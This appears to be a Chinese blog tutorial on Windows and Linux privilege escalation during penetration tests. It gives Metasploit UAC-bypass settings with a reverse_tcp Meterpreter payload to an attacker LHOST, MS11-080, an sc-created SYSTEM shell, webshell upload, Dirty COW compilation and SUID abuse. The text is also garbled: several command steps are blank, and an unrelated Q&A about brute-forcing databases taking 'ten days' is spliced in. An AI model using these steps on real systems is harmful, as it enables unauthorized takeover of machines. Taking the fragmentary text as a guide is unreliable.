渗透测试之内网提权
UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。
当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac
开始提权
getsystem
提权失败 一般都是上面说的uac的问题 常识 bypass uac
输入background 让该会话在后台运行 不在这个模式下 没办法调用msf的提权模块
使用提权工具
set SESSION 2(这个session要和之前监听的那个session一样 否则不成功)
set TECHNIQUE up.exe
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
show options
sessions -i
exploit
或者使用
use post/windows/gather/enum_patches
需要设置一下session
如果目标系统安装了安全更新的话是无法提权成功的
出现这种情况就是无法成功提权 可利用的漏洞都被打上补丁了
或者漏洞编号:ms11-080
windows 7、8、08、12、16下可以成功 2003也可以
关于sc命令:
SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。
这个命令的意思是创建一个名叫syscmd的新的交互式的cmd服务
然后执行
sc start systcmd,就得到了一个system权限的cmd环境
网站渗透提权到爆破数据库密码需要多长时间
网站渗透提权到爆破数据库密码需要十天。根据查询相关信息显示:高级网站渗透测试的话需要十天,是由人工对每个功能和代码进行全面的测试,看杜绝工具扫描,全靠人工实打实的实战经验基础。
渗透测试之Linux下提权
直接在kali里面启用apache服务
1:在终端输入“vim /etc/apache2/ports.conf” - 键盘输入i 进入插入编辑模式 - 修改apache2默认监听端口号为8080 - 编辑好后,按Esc键+“:wq” 保存退出 - 在终端输入“/etc/init.d/apache2 start”
2:- 在浏览器地址栏输入“”
直接用kali下的默认web站点 网站环境就不搭建了 直接在网站根目录下上传一个大马 前面挖洞传webshell就跳过了 直接开始提权
上传一个大马上去
先用大马将脏牛提权利用工具上传到服务器上
执行
利用gcc编译dirty.c文件
再执行./dirty 运行dirty
最下面一行是恢复回原先root账号密码的方法
这里就不切换到脏牛创建的用户了
什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。
首先在本地查找符合条件的文件,有以下三个命令
常用的可用于suid提权的文件
我得Linux系统里面一个也没有 这个就过去了 百度也有一些关于SUID提权的文章
Linux提权有很多大牛开发好的提权工具可以参考以下网址
0条大神的评论